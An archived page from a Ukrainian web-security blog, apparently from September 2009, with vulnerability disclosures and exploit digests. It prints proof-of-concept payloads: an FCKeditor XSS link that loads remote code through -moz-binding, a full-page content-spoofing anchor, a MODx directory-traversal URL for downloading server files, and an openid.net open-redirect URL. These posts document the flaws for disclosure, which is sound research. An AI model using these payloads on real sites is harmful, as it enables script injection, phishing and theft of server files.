Архів за Вересень, 2009

XSS та Content Spoofing уразливості в FCKeditor

19:21 19.09.2009

07.07.2009

У червні, 23.06.2009, я знайшов Cross-Site Scripting та Content Spoofing уразливості в FCKeditor. Про що найближчим часом повідомлю розробникам редактора.

Раніше я вже писав про уразливості в FCKeditor.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

19.09.2009

XSS:

В FCKEditor є Persistent XSS уразливість, що дозволяє розміщувати XSS код на сайтах, які його використовуть. Атака (в Mozilla і Firefox) відбувається через розміщення лінки з вказанням стилю:

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>

Content Spoofing:

Це Persistent Content Spoofing уразливість.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

Дані уразливості в самому редакторі, а не в аплоадері, як більшість уразливостей, про які я писав раніше. Тому їх можна використати на будь-якому сайті, що використовує FCKeditor в якості редактора для веб форм.

Уразливі FCKeditor 2.6.4 та попередні версії.

Добірка експлоітів

16:08 19.09.2009

В даній добірці експлоіти в веб додатках:

  • TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit (деталі)
  • Den Dating 9.01(searchmatch.php) SQL Injection Vulnerability (деталі)
  • Bloggeruniverse v2Beta (editcomments.php id) SQL Injection Exploit (деталі)
  • Dacio’s CMS 1.08 (XSS/SQL/DD) Multiple Remote Vulnerabilities (деталі)
  • GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln (деталі)
  • Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities (деталі)
  • SkaDate Online 7 Remote Shell Upload Vulnerability (деталі)
  • PHP Krazy Image Host Script 1.01 (viewer.php id) SQL Injection Vuln (деталі)
  • InselPhoto 1.1 (query) Remote SQL Injection Exploit (деталі)
  • Baran CMS 1.0 Arbitrary ASP File Upload/DB/SQL/XSS/CM Vulns (деталі)
  • Free Joke Script 1.0 Auth Bypass / SQL Injection Vulnerability (деталі)
  • Vlinks 1.1.6 (id) Remote SQL Injection Vulnerability (деталі)
  • IdeaCart 0.02 (LFI/SQL) Multiple Remote Vulnerabilities (деталі)
  • CmsFaethon 2.2.0 (info.php item) SQL Command Injection Exploit (деталі)
  • BlogWrite 0.91 Remote FD / SQL Injection Exploit (деталі)

Уразливості в FileDownload Snippet для MODx

23:51 18.09.2009

У січні, 16.01.2009, я знайшов Directory Traversal та Full path disclosure уразливості в FileDownload Snippet для MODx (популярної CMF і CMS). Уразливості виявив на офіційному сайті системи http://modxcms.com. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в MODx CMS.

Directory Traversal:

http://site/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=../index.php

Дана уразливість може використовуватися для Arbitrary File Disclosure атаки. Можна викачати будь-які файли з сервера, окрім тих, що містять в шляху та імені рядки “manager” і “config.inc.php”.

Full path disclosure:

http://site/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=1

Як я пізніше дізнався на secunia.com, раніше в 2007 році вже була виявлена подібна уразливість в даному веб додатку - FileDownload Snippet for MODx “download.php” Arbitrary File Download. Але розробники зробили вигляд, що виправили її. Але насправді вони виправили уразливість погано - лише заборонили рядки “manager” та “config.inc.php” в шляху та імені файла, але можливість Directory Traversal залишилася.

Введення в хакінг

22:42 18.09.2009

В своїй презентації Introduction to Hacking for University Hack Day, Christian Heilmann розповідає про хакерів та пояснює сучасне значення хакінга.

DoS проти Mozilla Firefox

19:13 18.09.2009

24.06.2009

Виявлена DoS уразливість в Mozilla Firefox.

Уразливі версії: Mozilla Firefox з підримкою SVG.

Відмова при малюванні окружності з великим радіусом через розмітку SVG.

  • Firefox (all?) Denial of Service through unclamped loop (SVG) (деталі)

18.09.2009

Додаткова інформація.

  • Update: [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG) (деталі)

Добірка уразливостей

16:29 18.09.2009

В даній добірці уразливості в веб додатках:

  • New lighttpd packages fix various problems (деталі)
  • DriveCMS article.php remote sql injection (деталі)
  • Enthusiast 3 Remote Code Execution (деталі)
  • Metrica Service Assurance Multiple Cross Site Scripting (деталі)
  • Multiple remote vulnerabilities MoinMoin v1.80 (деталі)
  • Cross-site scripting (XSS) vulnerability in Gallery (деталі)
  • Directory traversal vulnerability in Gallery (деталі)
  • Information disclosure in Gallery (деталі)
  • Directory traversal vulnerability in Gallery (деталі)
  • HP Insight Diagnostics, Remote Unauthorized Access to Files (деталі)

DoS в Internet Explorer 6

22:42 17.09.2009

Новий тест для вашого браузера. Даний експлоіт виконує DoS атаку на Microsoft Internet Explorer 6 (та можливо наступні версії IE).

В результаті роботи експлоіта браузер зависає (тобто DoS атака). По інформації від автора експлоіта, IE повинен вилітати, але, як я протестував на моєму Internet Explorer 6, браузер зависає. Атака відбувається при наведенні курсору на таблицю - це DoS при MouseOver, подібна до уразливості в Google Chrome.

Протестувати Internet Explorer 6

Останній тест для IE був DoS в Internet Explorer, з яким ви також можете ознайомитися.

Google закриває чергові уразливості в Chrome

19:37 17.09.2009

Компанія Google була змушена випустити ряд виправлень, що закривають декілька уразливостей у браузері Chrome, наявність яких дозволяла зловмиснику віддалено одержати контроль над комп’ютером жертви. Серед дір закритих у версії Chrome 2.0.172.43, наявні дві уразливості високої важливості і одна з помірним рівнем ризику.

Перша уразливість пов’язана з V8, вбудованим у браузер інструментом обробки JavaScript. Його наявність дозволяє розміщеному на веб-ресурсі JavaScript, що складений особливим чином, робити зчитування з заборонених областей пам’яті, обходити перевірки системи безпеки і виконувати довільний код усередині віртуалізованого середовища Chrome.

Ще одна уразливість може приводити до вибивання процесу, що відповідає за роботу вкладок у тому випадку, якщо користувач переходить на сторінки, що використовують шкідливі XML.

Утім, у компанії Google не преминули замітити, що завдяки наявності в Chrome технологія віртуалізації всім перерахованим вище уразливостям не був привласнений статус критичних.

По матеріалам http://www.xakep.ru.

Добірка експлоітів

16:07 17.09.2009

В даній добірці експлоіти в веб додатках:

  • AdaptCMS Lite 1.4 (XSS/RFI) Multiple Remote Vulnerabilities (деталі)
  • Hedgedog-CMS <= 1.21 Remote Command Execution Exploit (деталі)
  • WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability (деталі)
  • webframe 0.76 Multiple File Inclusion Vulnerabilities (деталі)
  • Thyme <= 1.3 (export_to) Local File Inclusion Vulnerability (деталі)
  • Hedgehog-CMS 1.21 (LFI) Remote Command Execution Exploit (деталі)
  • Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability (деталі)
  • q-news 2.0 Remote Command Execution Exploit (деталі)
  • Papoo CMS 3.x (pfadhier) Local File Inclusion Vulnerability (деталі)
  • ProFTPd with mod_mysql Authentication Bypass Vulnerability (деталі)
  • Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit (деталі)
  • BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • AuthPhp 1.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Potato News 1.0.0 (user) Local File Inclusion Vulnerability (деталі)

Уразливості на openid.net

23:54 16.09.2009

Ще 07.11.2007 я знайшов Redirector та Full path disclosure уразливості на секюріті сайті http://openid.net. Також тоді я знайшов й інші уразливості, зокрема Directory Indexing, але зараз вони вже виправлені (окрім цих двох). Про що найближчим часом сповіщу адміністрацію сайта.

Redirector:

http://openid.net/redirect.php?site=websecurity.com.ua

Full path disclosure:

http://openid.net/redirect.php?site=%0A1